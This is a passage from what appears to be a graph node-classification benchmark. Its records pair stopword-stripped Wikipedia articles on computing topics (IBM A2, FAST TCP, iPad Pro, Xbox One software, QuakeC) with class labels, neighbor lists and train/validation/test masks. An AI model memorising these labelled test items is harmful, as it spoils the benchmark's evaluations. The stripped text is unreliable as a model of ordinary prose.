    "text": "IBM_A2:ibm a2 ibm a2 massively multicore capable multithreaded 64-bit power isa processor core designed ibm using power isa v.2.06 specification versions processors based a2 core range 2.3 ghz version 16 cores consuming 65 w less powerful four core version consuming 20 w 1.4 ghz a2 core capable four-way multithreading 16 kb+16 kb instruction data cache per core core variants execute instructions in-order a2 core processor core designed customization embedded use system chip-devices implements 64-bit power isa v.2.06 book iii-e embedded platform specification support embedded hypervisor features 4-way simultaneous multithreaded core 4×32 64-bit general purpose registers gpr full support little big endian byte ordering core fine grain branch prediction unit bpu eight 1024-entry branch history tables 16 kb 8-way set-associative level-1 data cache 4-way set-associative 16 kb level-1 instruction cache executes simple in-order pipeline capable issuing two instructions per cycle one 6-stage arithmetic logic unit alu one optional auxiliary execution unit axu includes memory management unit floating point unit fpu facilities handled axu support number standardized customized macros floating point units vector units dsps media accelerators units instruction sets registers part power isa core system interface unit used connect die cores 256-bit interface data writes 128-bit interface instruction data reads full core speed poweren power edge network wire-speed processor designed hybrid regular networking processors switching routing typical server processor manipulating packaging data revealed february 8 2010 isscc 2010 chip 8 mb cache well multitude task-specific engines besides general-purpose processors xml cryptography compression regular expression accelerators mmus four 10 gigabit ethernet ports two pcie lanes four chips linked smp system without additional support chips chips said extremely complex according charlie johnson chief architect ibm use 1.43 billion transistors die size 428 mm² fabricated using 45 nm process blue gene/q processor 18 core chip running 1.6 ghz special features fast thread context switching quad simd floating point unit 5d torus chip-to-chip network 2 gb/s external i/o cores linked crossbar switch half core speed 32 mb edram l2 cache l2 cache multi-versioned supports transactional memory speculative execution blue gene/q chip two ddr3 memory controllers running 1.33 ghz supporting 16 gb ram uses 16 cores computing one core operating system services 17th core take care interrupts asynchronous i/o mpi flow control ras functionality 18th core used spare case one cores permanently damaged instance manufacturing shut functional operation blue gene/q chip manufactured ibm copper soi process 45 nm deliver peak performance 204.8 gflops 1.6 ghz draws 55 watts chip die size 19×19 mm 359.5 mm² uses 1.47 billion transistors",
    "neighbors": [
      6914,
      4868,
      10501,
      3846,
      4743,
      6663,
      5642,
      1548,
      1933,
      6926,
      3472,
      4881,
      7065,
      1563,
      1309,
      3493,
      6949,
      6311,
      8102,
      1321,
      8231,
      9391,
      10543,
      4017,
      5297,
      10675,
      1461,
      4918,
      8120,
      6715,
      1725,
      1983,
      1985,
      10180,
      336,
      5457,
      8530,
      3540,
      342,
      9302,
      731,
      11613,
      6878,
      479,
      1635,
      869,
      10214,
      10985,
      10734,
      3185,
      4211,
      5235,
      630,
      8058,
      3323,
      8700
    ],
    "mask": "None"
  },
  {
    "node_id": 9021,
    "label": 5,
    "text": "FAST_TCP:fast tcp fast tcp also written fasttcp tcp congestion avoidance algorithm especially targeted long-distance high latency links developed netlab california institute technology commercialized fastsoft fastsoft acquired akamai technologies 2012 fasttcp compatible existing tcp algorithms requiring modification computer sending data name fast recursive acronym fast aqm scalable tcp aqm stands active queue management tcp stands transmission control protocol role congestion control moderate rate data transmitted according capacity network rate users transmitting like tcp vegas fast tcp uses queueing delay instead loss probability congestion signal current congestion control algorithms detect congestion slow discover packets dropped average sending rate depends loss probability two drawbacks first low loss probabilities required sustain high data rates case tcp reno low loss probabilities required even new congestion avoidance algorithms h-tcp bic tcp hstcp require loss rates lower provided wireless wide area networks moreover packet loss provides single bit information congestion level whereas delay continuous quantity principle provides information network fast tcp flow seeks maintain constant number packets queues throughout network number packets queues estimated measuring difference observed round trip time rtt base rtt defined round trip time queueing base rtt estimated minimum observed rtt connection packets queued sending rate increased many queued rate decreased respect direct descendant tcp vegas difference tcp vegas fast tcp lies way rate adjusted number packets stored small large tcp vegas makes fixed size adjustments rate independent far current rate target rate fast tcp makes larger steps system equilibrium smaller steps near equilibrium improves speed convergence stability delay-based algorithms principle maintain constant window size avoiding oscillations inherent loss-based algorithms however also detect congestion earlier loss-based algorithms since delay corresponds partially filled buffers loss results totally filled buffers either strength weakness protocol used network delay-based inefficiency loss avoided however loss-based delay-based protocols share network delay-based algorithms tend less aggressive overcome suitable choice parameters leading complex interactions studied tang et al delay measurements also subject jitter result operating system scheduling bus contention whether strengths weaknesses prevail clear depends large part particular scenario propagation delay used fast window control algorithm clean network queueing delay maintained existing fast flows may mistaken part propagation delay new flows join later shown ns-2 simulations effect estimation error equivalent modifying underlying utility functions favor new flows existing flows method eliminate error suggested fast tcp shown promising terms system stability throughput fairness however requires buffering increases linearly number flows bottlenecked link paper proposes new tcp algorithm extends fast tcp achieve α n -proportional fairness steady state yielding buffer requirements grow nth power number flows authors call new algorithm generalized fast tcp prove stability case single bottleneck link homogeneous sources absence feedback delay simulation results verify new scheme stable presence feedback delay buffering requirements made scale significantly better standard fast tcp unlike tcp congestion avoidance algorithms fast tcp protected several patents instead seeking standardization ietf inventors fast notably steven h. low cheng jin seeking commercialize company fastsoft currently fastsoft sells 1-unit rack appliance deployed sender-side software hardware modifications needed either end",
    "neighbors": [
      7017,
      8170,
      1835,
      10124,
      10924,
      7983,
      112,
      2934,
      5817,
      6524,
      10653,
      2079
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9022,
    "label": 2,
    "text": "IPad_Pro:ipad pro ipad pro family line ipad tablet computers designed developed marketed apple inc. runs ios ipados mobile operating systems current generation available two screen sizes four options internal storage capacities 64 256 512 gb 1 tb first ipad pro 12.9-inch version announced september 9 2015 released november 11 2015 larger previous ipad models first ipad tablet feature lpddr4 ram 12.9-inch tablet later followed smaller 9.7-inch version announced march 21 2016 released march 31 year june 5 2017 second generation ipad pro announced features a10x fusion processors basic storage 64 gb optional 512 gb upgraded displays include new 10.5-inch version replace 9.7-inch model 12.9-inch version refreshed following announcement models first generation ipad pro discontinued third generation ipad pro announced october 30 2018 available two screen sizes feature full screen displays 11-inch model replacing 10.5-inch model previous generation also feature 1 tb storage face id works vertical horizontal orientations feature apply iphones face id third generation feature home button 12.9-inch version ipad pro announced apple special event september 9 2015 released november 11 2015 gold silver space gray color options prices ranging us 799.99 1,229.99 based storage size cellular connectivity march 21 2016 9.7 inch version ipad pro announced apple keynote additional rose gold color option 9.7 inch version also introduced ability choose base 32gb model cellular wifi option previously cellular wifi option available 128gb ipad pro models 9.7 inch model priced 599 1,129 depending configuration released march 31 2016 9.7-inch ipad pro compared ipad air 2 features faster cpu better camera first ipad feature true tone flash retina flash also highest storage ipad time 256 gb storage option true tone display allows lcd adapt ambient lighting change color intensity different environments ipad pro models include a9x chip apple m9 motion co-processor 9.7 inch model however slightly underclocked cpu 2.16 ghz compared 2.26 ghz 12.9 inch model 2 gb ram number features carried standard ipad touch id retina display new features include smart connector keyboard four stereo speakers located pairs top bottom device 12.9 inch model 2732-by-2048 retina display 264 pixels per inch 9.7 inch model 2048-by-1536 retina display 264 pixels per inch features variable refresh rate first apple 12.9 inch version ipad pro first ipad include 4 gb ram customized 12.9 inch ipad pro also designed jony ive submitted time design auction special edition ipad pro edition 1 1 label engraved back comes custom yellow-gold anodised finish blue leather smart cover orange leather apple pencil case cover sold apple elsewhere second generation ipad pro announced june 5 2017 alongside ios 11 2017 wwdc second-generation ipad pro models 10.5-inch 12.9-inch a10x hexa-core cpu 12-core gpu apple promotion display technology supports hdr10 dolby vision content ios 11 later 120 hz refresh rate true tone display 50 percent brighter earlier models sizes also 12-megapixel rear-facing camera quad-led true-tone flash 7-megapixel front-facing camera retina flash usb-c connection speeds using lightning cables usb-c fast-charge support second generation ipad pro storage capacities 512 gb march 18 2019 10.5-inch ipad pro discontinued replaced 10.5-inch ipad air third generation ipad pro announced october 30 2018 apple special event howard gilman opera house brooklyn new york redesigned 2018 models feature new edge-to-edge liquid retina displays face id improved 12mp 7mp cameras usb-c connectors apple a12x bionic processors tablets offered 11-inch 12.9-inch sizes first ipad models offer tap-to-wake lcd displays following iphone x 1tb internal storage additionally third generation tablets lack touch id headphone jack former superseded face id released november 7 2018 available silver space gray four accessories made specifically ipad pro sold separately smart screen cover attachable keyboard smart keyboard active bluetooth tracking stylus apple pencil form-fitted silicone case compatible smart keyboard smart keyboard docks ipad pro using smart connector magnetic connection provides data transfer power smart keyboard doubles kickstand comparable competing microsoft surface pro design smart keyboard similar design smart cover accessory first generation apple pencil precision stylus exclusive ipad pro ipad 2018 ipad air ipad mini released 2019 accessory rechargeable via lightning port tablet ipad pro introduces new display increased responsiveness precision previous ipad displays apple pencil support added keynote apple demonstrated drawing managing publication layout document annotation second generation apple pencil functions exclusively 2018 ipad pro models new features include gesture controls wireless pairing charge wirelessly ipad ipad pro 9.7-inch version set record among currently released tablets tested color accuracy screen reflectance peak brightness contrast rating high ambient light smallest color variation however ipad pro 12.9-inch version tested better contrast ratio dark despite apple advertising tablets pc replacements reviewers noted could replace laptop running microsoft windows macos linux desktop operating systems current operating system scott stein cnet praised faster processor new accessories available however criticized cost unit accessories noting slightly slower processor less ram compared larger 12.9-inch model matt swider techradar complimented easy handling large 256gb configuration true tone display upset high starting price gareth beavis gave positive review commending expansive screen audio quality stated battery life could made longer max parker trustedreviews gareth beavis techradar praised 10.5-inch model high-quality audio performance though critics noted expensive reviewing 12.9 inch second-generation ipad pro lauren goode verge complimented quality camera a10x processor large screen size argued device could cheaper third generation ipad pro models praised better displays slimmed bezels general speed well cpu improvements ben sin forbes noted although screen still lcd screen 120 hz refresh rate makes feel smooth switch usb-c connectors received mixed reviews external monitor support device charging added cost extra dongles use older cables headphones reviewers noted although hardware updates great steps forward ios limitations including lack external storage capabilities prevents third generation competing computers high prices also criticized upcoming ipados address lack external storage supported ipads moreover body criticized ability bend break easily users forum boards reported ipad bending days use carrying around backpack youtuber zack nelson published video channel jerryrigeverything showing device cracking snapping half applying small amount pressure hands center device nelson concluded two weakest points right dead center either side ipad pro crack happened poorly placed microphone hole new apple pencil 2 charging duct reports devices already bent right box devices cellular models also surfaced apple responded reports quickly asserting normal non-issue response criticized according apple bending byproduct new manufacturing process apple added support page relating issues",
    "neighbors": [
      10755,
      9732,
      1549,
      5647,
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      6186,
      4139,
      6700,
      7211,
      1074,
      8754,
      9784,
      8253,
      576,
      1090,
      8783,
      4180,
      10838,
      1623,
      3672,
      10840,
      9312,
      3681,
      9826,
      5733,
      8806,
      3691,
      2673,
      6258,
      2676,
      10357,
      6264,
      4220,
      7292,
      2686,
      6783,
      7806,
      10365,
      10878,
      4741,
      8842,
      6283,
      6797,
      7824,
      147,
      7830,
      6807,
      5784,
      1177,
      4251,
      3228,
      2207,
      4258,
      7842,
      7844,
      11430,
      171,
      2735,
      3248,
      4283,
      3772,
      7869,
      8893,
      8896,
      6654,
      4807,
      713,
      4810,
      3790,
      1744,
      7378,
      3286,
      9430,
      3293,
      4318,
      9952,
      6884,
      231,
      2282,
      9451,
      1772,
      4844,
      1776,
      10481,
      8441,
      7420,
      2819,
      1290,
      3338,
      781,
      4879,
      784,
      9999,
      10512,
      4888,
      5912,
      8480,
      10023,
      1832,
      4910,
      4399,
      7983,
      823,
      7991,
      11066,
      2363,
      2365,
      2366,
      9022,
      11257,
      1346,
      10562,
      838,
      7496,
      8525,
      2383,
      2388,
      8534,
      3928,
      8540,
      4957,
      6495,
      8544,
      9063,
      10602,
      3948,
      11629,
      10608,
      9084,
      7549,
      11649,
      2439,
      6023,
      3977,
      6539,
      7052,
      1428,
      3483,
      10658,
      2979,
      9123,
      11173,
      8109,
      10675,
      2492,
      446,
      7614,
      5058,
      10691,
      2502,
      456,
      1482,
      7118,
      464,
      6608,
      8662,
      9174,
      10199,
      8665,
      7133,
      9182,
      4068,
      5093,
      487,
      2023,
      8170,
      5616,
      6130,
      5619,
      7154,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 9023,
    "label": 9,
    "text": "Unit_generator:unit generator unit generators ugens basic formal units many music-n-style computer music programming languages sometimes called opcodes particularly csound though expression accurate machine-level instructions unit generators form building blocks designing synthesis signal processing algorithms software example simple unit generator called osc could generate sinusoidal waveform specific frequency given input argument function class represents unit generator env could unit generator delineates breakpoint function thus env could used drive amplitude envelope oscillator osc equation osc*env unit generators often use predefined arrays values functions filled waveforms shapes calling specific generator function unit generator theory sound synthesis first developed implemented max mathews colleagues bell labs 1950s supercollider language .ar method sinosc class ugen generates sine wave example makes sine wave frequency 440 phase 0 amplitude 0.5",
    "neighbors": [
      9210,
      7535,
      8947,
      372,
      6933,
      791,
      6810,
      2556,
      7550
    ],
    "mask": "Test"
  },
  {
    "node_id": 9024,
    "label": 4,
    "text": "Twinge_attack:twinge attack internet-based computer-networking twinge attack flood false icmp packets attempt cripple system attack spoofed random fake internet source addresses used makes difficult identify attacker idea attack either degrade performance attacked computer make crash attacking program called twinge icmp packets particular signature gives identity away long computer safely behind router firewall nothing worry attack attack used compromise system steal information simply annoyance easy way avoid attack set router firewall ignore icmp ping packets internet",
    "neighbors": [
      4163,
      3024,
      8692,
      5402,
      7515
    ],
    "mask": "Test"
  },
  {
    "node_id": 9025,
    "label": 4,
    "text": "Backup_software:backup software backup software computer programs used perform backup create supplementary exact copies files databases entire computers programs may later use supplementary copies restore original contents event data loss hence 're useful users several features backup software make effective backing data voluming allows ability compress split backup data separate parts storage smaller removable media cds often used cds easy transport off-site inexpensive compared hard drives servers however recent increase hard drive capacity decrease drive cost made voluming far less popular solution introduction small portable durable usb drives increase broadband capacity provided easier secure methods transporting backup data off-site since hard drive space cost compressing data reduce size allowing less drive space used save money many backup solutions offer plug-in access exclusive use locked files backup solutions generally support differential backups incremental backups addition full backups material newer changed compared backed data actually backed effect increase significantly speed backup process slow networks decreasing space requirements backup schedules usually supported reduce maintenance backup tool increase reliability backups prevent data theft backup software offers cryptography features protect backup prevent loss previously backed data backup backup software e.g areca backup argentum backup offer transaction mechanism commit rollback management critical processes backups merges guarantee backups integrity",
    "neighbors": [
      2944,
      7685,
      3463,
      10503,
      2953,
      9484,
      1293,
      6545,
      2322,
      11543,
      6297,
      7715,
      10276,
      3366,
      7718,
      7081,
      3629,
      4401,
      4659,
      5300,
      2107,
      956,
      5057,
      5313,
      9925,
      3913,
      4170,
      9802,
      1996,
      1358,
      3794,
      10711,
      2907,
      1885,
      4574,
      4704,
      5728,
      11492,
      11366,
      5737,
      3053,
      6768,
      11633,
      9842,
      5491,
      10101,
      6396,
      9983
    ],
    "mask": "Validation"
  },
  {
    "node_id": 9026,
    "label": 3,
    "text": "Winter_Games:winter games winter games sports video game developed epyx released europe u.s. gold based sports featured winter olympic games snow-and-ice themed follow-up highly successful summer games winter games released 1985 commodore 64 later ported several popular home computers video game consoles 1980s game presented virtual multi-sport carnival called epyx winter games official ioc licensing place 8 players choosing country represent taking turns competing various events try medal events available vary slightly depending platform include following game allowed compete events sequentially choose events choose one event practice event winter games ported amiga apple ii atari st apple macintosh apple ii amstrad cpc zx spectrum dos computer platforms atari 2600 atari 7800 nintendo entertainment system family computer disk system video game consoles 2004 featured one games c64 direct-to-tv virtual console version released europe february 20 2009 winter games epyx best-selling commodore game late 1987 sales surpassed 250,000 copies november 1989 info rated winter games four-plus stars five stating event good enough sold separately concluding sports simulation best 1985 zzap 64 gave 94 game calling another classic sport simulation epyx lemon64 website users given average vote 8.6 places game top 20 list site game reviewed 1988 dragon 132 hartley patricia kirk lesser role computers column reviewers gave game 3½ 5 stars spectrum version topped charts month april however nes famicom disk system versions critically panned unresponsive controls abysmal music poor graphics",
    "neighbors": [
      8361,
      9166,
      95
    ],
    "mask": "Test"
  },
  {
    "node_id": 9027,
    "label": 2,
    "text": "Ancient_UNIX:ancient unix ancient unix term coined santa cruz operation describe early releases unix code base released prior unix system iii particularly research unix releases prior including version 7 base unix/32v well later developments unix publication lions book work undertaken release earlier versions codebase sco first released code limited educational license later january 2002 caldera international sco group relicensed made available several versions four-clause bsd license namely far widespread use code used emulator systems version 5 unix made run nintendo game boy advance using simh pdp-11 emulator version 6 unix provided basis mit xv6 teaching system update version ansi c x86 platform example relicensing old unix code bases affected modern computing community bsd vi text editor based code ed line editor early unixes therefore traditional vi could distributed freely various work-alikes nvi created code longer encumbered traditional vi adapted modern unix-like operating systems sco group inc. previously called caldera international result sco group inc. v. novell inc. case novell inc. found transferred copyrights unix sco group inc concerns raised regarding validity caldera license suggesting may valid",
    "neighbors": [
      6787,
      132,
      6412,
      11023,
      5397,
      1304,
      3487,
      3488,
      7460,
      3241,
      7983,
      3248,
      2995,
      9141,
      823,
      9784,
      9151,
      10436,
      1865,
      4298,
      6369,
      9444,
      2035,
      5492,
      2424,
      633,
      4859
    ],
    "mask": "None"
  },
  {
    "node_id": 9028,
    "label": 3,
    "text": "TEST_(x86_instruction):test x86 instruction x86 assembly language codice_1 instruction performs bitwise two operands flags codice_2 codice_3 codice_4 modified result discarded codice_5 codice_6 flags set codice_7 codice_8 flag undefined 9 different opcodes test instruction depending type size operands compare 8-bit 16-bit 32-bit 64-bit values also compare registers immediate values register indirect values test operation sets flags codice_6 codice_5 zero codice_2 set significant bit result result codice_7 codice_3 set codice_14 otherwise set codice_7 parity flag set bitwise xnor least significant byte result codice_14 number ones byte even codice_7 otherwise value codice_8 undefined",
    "neighbors": [
      11107,
      6596,
      6821,
      8143,
      5234,
      372,
      9911,
      1915
    ],
    "mask": "Train"
  },
  {
    "node_id": 9029,
    "label": 8,
    "text": "Web_Compatibility_Test_for_Mobile_Browsers:web compatibility test mobile browsers web compatibility test mobile browsers often mobile acid test test page published promoted world wide web consortium w3c expose web page rendering flaws mobile web browsers applications render html developed spirit acid test web standards project test relevant parts mobile browser need support test uses parts javascript test different technologies browser accomplish 16 different subtest indicated 4 x 4 raster squares mobile acid test tests variety web standards published world wide web consortium internet engineering task force specifically mobile acid test tests",
    "neighbors": [
      417,
      3462,
      9275,
      4561,
      2139,
      124,
      4797
    ],
    "mask": "Test"
  },
  {
    "node_id": 9030,
    "label": 2,
    "text": "System_Management_Interface_Tool:system management interface tool system management interface tool smit menu-based management tool ibm aix operating system allows user navigate menu hierarchy commands rather using command line",
    "neighbors": [
      9197,
      909
    ],
    "mask": "Train"
  },
  {
    "node_id": 9031,
    "label": 7,
    "text": "HP_IT_Management_Software:hp management software hp management software family enterprise software products micro focus result spin-merge hewlett packard enterprise software assets micro focus 2017 division formerly owned hewlett packard enterprise following separation hewlett-packard hp inc. hewlett packard enterprise 2015 management software family technology helps companies manage infrastructures people processes required reap greatest amount responsiveness effectiveness today multi-layered highly complex data centers beginning september 2005 hp purchased several software companies part publicized deliberate strategy augment catalog management software offerings large business customers according zdnet idc hp world sixth largest software company hp management software largest category software sold hp software division concept behind management software needs support business run business rather cost center discipline includes software help businesses manage portfolio assets gain greater quality govern processes improve security name according computerworld management software designed help businesses align spend resources based business priorities companies develop sell management software include ibm bmc software borland ca compuware micro focus sells several categories software including business service management software application lifecycle management software mobile apps big data analytics service portfolio management software automation orchestration software enterprise security software micro focus also provides software service saas cloud computing solutions software services including consulting education professional services support information see micro focus hp software division vivit worldwide independent hp software community designed help members develop expertise careers education community advocacy programs almost two decades vivit independent unbiased trusted field-tested community thousands hp software customers developers partners areas world business industry vivit membership free actual user group itrc online forum hp software solutions products new hp user group hp software solutions community officially launched publicly april 2010 includes number former software-related communities june 2011 hp software announced new discover performance community online resource center designed serve executives cios",
    "neighbors": [
      4194,
      5571,
      1638,
      5384,
      4107,
      9488,
      11505,
      467,
      3323
    ],
    "mask": "None"
  },
  {
    "node_id": 9032,
    "label": 0,
    "text": "Yuji_Matsumoto:yuji matsumoto 1979 got bachelor degree information science kyoto university received master place two year later ended ph.d. 1990 1984 1985 became visiting professor imperial college science technology department university london 1985 1987 deputy chief institute new generation computer technology 1988 1989 served associated professor data processing center division kyoto university next year position place worked department electrical engineering 1993 became professor nara institute science technology 1988 became takahashi incentive award recipient 1989 awarded motooka commemorative award 1994 received astem software award three years later became recipient best paper award information processing society japan following best author award place 2000 acceptance fellowship 2006 2002 2004 annually awarded best presentation association natural language processing 2005 awarded best paper award japanese society artificial intelligence received one next year dews two year later jsai awarded achievement award 2011 named fellow association computational linguistics",
    "neighbors": [
      1890,
      7724
    ],
    "mask": "None"
  },
  {
    "node_id": 9033,
    "label": 2,
    "text": "Xbox_One_system_software:xbox one system software xbox one system software sometimes called xbox os operating system eighth-generation home video game console xbox one microsoft windows-based operating system using hyper-v virtual machine monitor contains separate operating systems games applications run console located internal hdd day-to-day usage also duplicated internal nand storage console recovery purposes factory reset functionality xbox one allows users download applications add functionality dashboard june 2014 onwards entertainment apps longer required user signed valid xbox live gold account order use features advertised given app since launch microsoft updating os monthly updates downloaded xbox live service directly xbox one subsequently installed using offline recovery images downloaded via pc november 2015 major system update known new xbox one experience released brought significant changes design functionality system windows 10-based core replaced windows 8-based one update new system sometimes referred windows 10 xbox one xbox one console runs operating system includes windows 10 core although initially included windows 8 core xbox one release xbox one system software contains heavily modified hyper-v hypervisor known nanovisor host os two partitions one partitions exclusive partition custom virtual machine vm games partition shared partition custom vm running multiple apps shared partition contained windows 8 core launch november 2015 via system update known new xbox one experience upgraded windows 10 core windows 10 universal windows platform apps became available xbox one according current head microsoft gaming division phil spencer importance entertainment games windows ecosystem become really prevalent company program microsoft launched allows developers build single app run wide variety devices including personal computers xbox one video game consoles according polygon microsoft removed distinction xbox one windows pc starting february 2014 microsoft invited select users join preview program enables receive early builds upcoming system updates experiment features prior public launch software registered xbox one preview program participants test early features included update provide feedback private forum opt future waves xbox feedback website microsoft soliciting input consumers features taking requests future additions console low battery notifications blu-ray 3d support two examples ideas among top vote-getters site xbox one system software interface uses geometrical placement squares rectangular items scrolls continuous horizontal line using metro design language also seen windows 8 windows 10 microsoft products dashboard divided home community oneguide store sections home section contains recent apps games list shortcuts pinned apps games community section allows users view friends in-game activities captures post status updates well view trending content oneguide section aggregates television online video content store section serves portal games video music app marketplaces general top level menu xbox one feels lot less cluttered xbox 360 dashboard example friends tab removed replaced dedicated app users load see connections couple columns settings options area pinned favorites main screen showing current recent apps games user played used small new section highlighting recently added content total interface clean sparse microsoft also introduced new way multitask called snap allows xbox one users open multiple panes single window microsoft upgraded windows 8-based core windows 10-based one made tour new user interface xbox wire promising faster easier navigation improved community features return xbox avatars main feature home screen list recently played games selecting given title give users information announcements achievements social activity forth also focused actual games playing part parcel company ’ new direction phil spencer current head microsoft xbox division like video game consoles xbox one primarily designed playing games game console entertainment hub games television music videos mainly console focuses functionality entertainment whole gamescom 2014 microsoft unveiled new plan remedy make earnest xbox one ’ label all-in-one entertainment solution way expanding media support xbox one media player quite similar xbox 360 playback suite terms form function however newer console supports 30 formats including mkv container gif files xbox one console also unique things example owners control television broadcasts using device well use functioning dvr apart streaming music videos via play charms devices play also networked approach two primary ways first stream media computer tablet second play directly usb flash drive advantage method play system users wherever sit via xbox one instead sending video pc console aside multimedia files xbox one plays cds dvds blu-ray discs also comes dlna mkv support means downloaded video files streamed via pc transported via external hard drive usbs meanwhile interactive tv guide allows users turn control television voice furthermore system comes comprehensive range applications related multimedia features united states video channels include example amazon instant video crackle hulu plus netflix microsoft announced xbox one awarded multimedia capabilities 66th annual technology engineering emmy awards early 2015 prize given xbox one television-on-demand functions xbox one backward compatible either original xbox xbox 360 console launch microsoft admitted attempts use cloud streaming allow xbox 360 games played xbox one proved problematic however e3 press conference june 15 2015 microsoft announced plans introduce xbox 360 backward compatibility using software method xbox one supported xbox 360 games supposed run within software emulator provided updated system software implementing hardware software xbox 360 xbox one recording broadcasting features supported along xbox 360 multiplayer achievements cloud save access unlike xbox 360 emulation original xbox games specifically patched need repackaged xbox one format users digitally-purchased games automatically appear library download available games physical media executed directly disc inserting disc initiates download repackaged version xbox one titles disc must inserted play validation purposes least 100 xbox 360 games officially supported available feature public launch alongside november 2015 new xbox one experience system update xbox one preview program members received early access limited number titles upon announcement microsoft expected number supported games increase significantly time xbox 360 games supported—this explicitly includes games require kinect access usb peripherals xbox division head phil spencer stated idea possibly adding support games original xbox silly xbox division focusing xbox 360 compatibility first june 11 2017 microsoft announced would backwards compatibility original xbox june 10 2019 microsoft announced wound bring addition new titles program order focus backward compatibility efforts project scarlett 2016 build conference announced xbox one consoles could updated include development kit universal windows applications xbox one official support platform cortana coming summer 2016 along introducing improvements fixes native console apps software monthly updates xbox one system software introduce major features voted requested community though months included one update starting february 2014 beta releases updates tested going live check unwanted bugs stability day console launch 2013 system update released remove controversial always-online drm announced electronic entertainment expo 2013 drm would required xbox one connect internet least every twenty-four hours else games would cease function wave backlash gamers press alike microsoft forced reverse policies regarding early users go online least receive patch february 2014 update introduced ability see much hard disk space available also introduced support usb keyboards enabling users plug keyboard console thus eliminating need use on-screen keyboard year later july 2015 phil spencer head xbox team vowed mouse support would added sometime future part cross-platform gameplay windows 10 devices xbox one console march 2014 update added support video output 50 frames per second rather 60 allowing smoother video 50 hz displays common europe united states refresh rates screens higher 60 hz europe june 2014 support added external hard drives 256 gigabytes allowing two connected console time via usb 3.0 part july 2014 update consoles could better understand voice commands spoken different accents dialects english german month later purchases official xbox website smartglass app enabled allowing easier content purchasing october 2014 update media player app added support many formats codecs including matroska container well dlna streaming networked devices march 2015 new screenshot feature added console along tile transparency allowing owners share game screenshots online use one menu background april 2015 due criticisms power consumption needed instant-on feature system update prompted users select instant-on energy saving mode instant-on enabled default u.s. drawing criticism natural resources defense council electronic entertainment expo 2015 june microsoft discussed three major features later came xbox one consoles november 2015 windows 10 streaming xbox 360 backward compatibility interface redesign known new xbox one experience advance public release windows 10 july 2015 update let users stream games xbox one device running windows 10 feature announced january 2015 service streams one device time february 2016 update slew new features became available example global leaderboards game ability hide unused expired beta games demos user game collection february 2016 update allowed users rearrange customized 'pins via controller whereas previously users use xbox one smartglass application use feature march 2016 update builds features introduced february 2016 update new features included march 2016 update ability purchase xbox 360 compatible games xbox one party chat broadcasting twitch streams customizable dvr recording lengths means owners record clip 5 minutes long improvements included ability track achievement progress xbox one guide video playback xbox one activity feed ability 16 people party chat ability track xbox 360 achievements xbox one activity feed improvements march 2016 update include ability launch web links youtube videos directly game hubs ability user compare avatars friends additionally update also introduces ability factory reset console without deleting installed games applications june 6 2016 first preview update windows 10 anniversary update made available participants preview program included many new features enhancements software build 14352 one first builds introduce cortana main aim help users undertake certain tasks setting party using voice commands unlike older kinect voice commands cortana gives users audio feedback commands similar pc windows mobile versions update also included refreshed design xbox store cementing relationship xbox one windows 10 pcs well redesigned 'my games apps interface includes vertical design rather older horizontal design 'my games apps interface build 14352 also gives user information downloading games apps percentage completed current download size total download size current download speed june 2016 update also includes new 'facebook friend finder allows users find add friends facebook xbox live final release public published july 30 2016 coincide release windows 10 anniversary update released days later august 2 2016 final release introduced newly redesigned universal store well integration universal windows platform march 29 2017 update released public known creators update coincide pc version released weeks later april 6 2017 released xbox insiders late february 2017 testing evaluation creators update featured number updates including refreshed homepage design new guide design new video screenshot capture controls well new game streaming service called beam accessibility also improved new feature called microsoft co-pilot allows users physical impairments 'hook second controller allow friend assist controls tapping xbox guide button longer takes user back home screen instead opens guide represents significant design paradigm shift compared older releases october 16 2017 fall update released major changes include ui overhaul using microsoft fluent design system modular home menu faster dashboard content transfer feature support usb webcams new guide menu improvements game dvr several miscellaneous functionality interface tweaks april 24 2018 april xbox update released changes include new video features auto low-latency mode support variable refresh rate output amd radeon freesync freesync 2 compatible displays addition xbox one x xbox one support output 2560 x 1440 1440p resolution games media improvements mixer share controller option start mixer broadcasts anywhere xbox one share captured screenshots clips directly twitter several audio improvements community tournaments available directly game hubs supported games club feeds also gained new filters may 18 2018 may xbox update released changes include support 120hz refresh rate powerful new enhancement pins called “ groups ” users create multiple collections content made anything within games apps trim recent game captures directly guide improved family settings improvements xbox accessories app several changes button commands throughout dashboard additionally then-forthcoming update added captive portal support console allowing users connect wireless networks requiring authentication commonly used colleges hotels well wireless hotspots provided internet service providers microsoft aims release frequent updates xbox one console mainly containing new improved features faster installation loading times games apps largest november 2015 named new xbox experience update gaming platforms microsoft gaming platforms generation gaming platforms seventh generation",
    "neighbors": [
      6150,
      10761,
      3605,
      10273,
      5666,
      1067,
      7215,
      8757,
      582,
      9812,
      607,
      4704,
      10338,
      8296,
      8299,
      7796,
      6265,
      1148,
      8316,
      8829,
      2179,
      6787,
      6797,
      10900,
      3224,
      7838,
      684,
      7359,
      4289,
      194,
      10957,
      4816,
      4305,
      9434,
      740,
      8423,
      9448,
      259,
      4356,
      11524,
      4364,
      782,
      8976,
      3857,
      11030,
      11546,
      11549,
      5406,
      7456,
      7970,
      3875,
      11559,
      1832,
      2345,
      3881,
      6441,
      4908,
      7983,
      3890,
      11060,
      321,
      2380,
      6476,
      11605,
      342,
      4439,
      6486,
      11103,
      2919,
      4458,
      9585,
      1916,
      2943,
      8576,
      1935,
      3477,
      929,
      8098,
      9655,
      3527,
      9166,
      4051,
      11221,
      5600,
      8681,
      9194
    ],
    "mask": "Test"
  },
  {
    "node_id": 9034,
    "label": 9,
    "text": "QuakeC:quakec quakec interpreted language developed 1996 john carmack id software program parts video game quake using quakec programmer able customize quake great extents adding weapons changing game logic physics programming complex scenarios used control many aspects game parts ai triggers changes level quake engine game engine use quakec following engines used dll game modules customization written c c++ id tech 4 quakec source original id software quake game logic published 1996 used basis modifications like capture flag others quakec source code compiled using tool called qcc bytecode kept file called progs.dat programmers quake modifications could publish progs.dat bytecode without revealing source code quake mods published way quakec allowed quake engine dominate direction first-person shooter genre thanks carmack idea extending video game life adding unlimited expandability extensibility already played big role doom enormous internet community gamers programmers alike arisen many modern multiplayer games extensible form quakec known interpreted quake runs continually interpreting progs.dat file syntax quakec based c programming language explaining name support implementation new types structures arrays kind referencing entity type always reference quakec also suffers fact many built-in functions functions prototyped quakec code actually defined within game engine written c return strings temporary string buffer hold one string given time words construct fail second call codice_2 converts floating-point value string overwrites string returned first call somefunction something quakec contain string handling functions file handling functions simply needed original game video games time game logic 